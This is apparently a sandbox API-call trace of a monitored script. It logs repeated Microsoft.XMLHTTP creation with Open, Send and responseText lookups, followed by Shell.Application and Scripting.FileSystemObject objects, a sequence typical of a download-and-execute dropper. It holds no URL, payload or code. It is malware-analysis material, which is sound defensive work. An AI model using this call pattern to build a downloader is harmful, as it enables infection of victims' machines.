	[0483.364] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0483.364] ??2@YAPEAX_K@Z () returned 0x62f310
	[0483.364] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0483.364] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0483.364] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0483.364] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0483.364] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0483.364] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0483.364] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0483.364] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0483.364] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0483.364] SysStringLen (param_1=0x0) returned 0x0
	[0483.364] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0483.364] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0483.364] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0483.364] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0483.364] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0483.364] ??2@YAPEAX_K@Z () returned 0x62f330
	[0483.364] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0483.364] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0483.365] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0483.365] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0483.365] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0483.365] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0483.365] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0483.365] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0483.365] longjmp () 
	[0483.365] longjmp () 
	[0483.365] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0483.365] SysStringLen (param_1=0x0) returned 0x0
	[0483.365] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0483.365] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0483.365] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0483.365] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0483.366] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0483.366] ??2@YAPEAX_K@Z () returned 0x62f310
	[0483.366] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0483.366] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0483.366] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0483.366] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0483.366] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0483.366] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0483.366] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0483.366] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0483.366] longjmp () 
	[0483.366] longjmp () 
	[0483.366] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0483.366] SysStringLen (param_1=0x0) returned 0x0
	[0483.366] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0483.366] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0483.367] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0483.367] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0483.367] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0483.367] ??2@YAPEAX_K@Z () returned 0x62f330
	[0483.367] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0483.367] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0483.367] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0483.367] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0483.367] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0483.367] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0483.367] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0483.367] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0483.367] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0483.367] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0483.367] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0483.539] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0483.540] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0483.540] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0483.540] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0483.540] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0483.540] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0483.540] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0483.540] SysStringLen (param_1=0x0) returned 0x0
	[0483.540] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0483.540] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0483.540] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0483.541] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0483.541] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0483.541] ??2@YAPEAX_K@Z () returned 0x62f350
	[0483.541] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0483.541] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0483.541] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0483.541] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0483.541] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0483.541] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0483.541] SysStringLen (param_1=0x0) returned 0x0
	[0483.541] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0483.544] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0483.544] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0483.544] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0483.544] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0483.544] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0483.545] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0484.763] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0484.764] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0484.764] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0484.765] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0484.765] SysStringLen (param_1=0x0) returned 0x0
	[0484.765] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0484.765] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0484.765] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0484.765] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
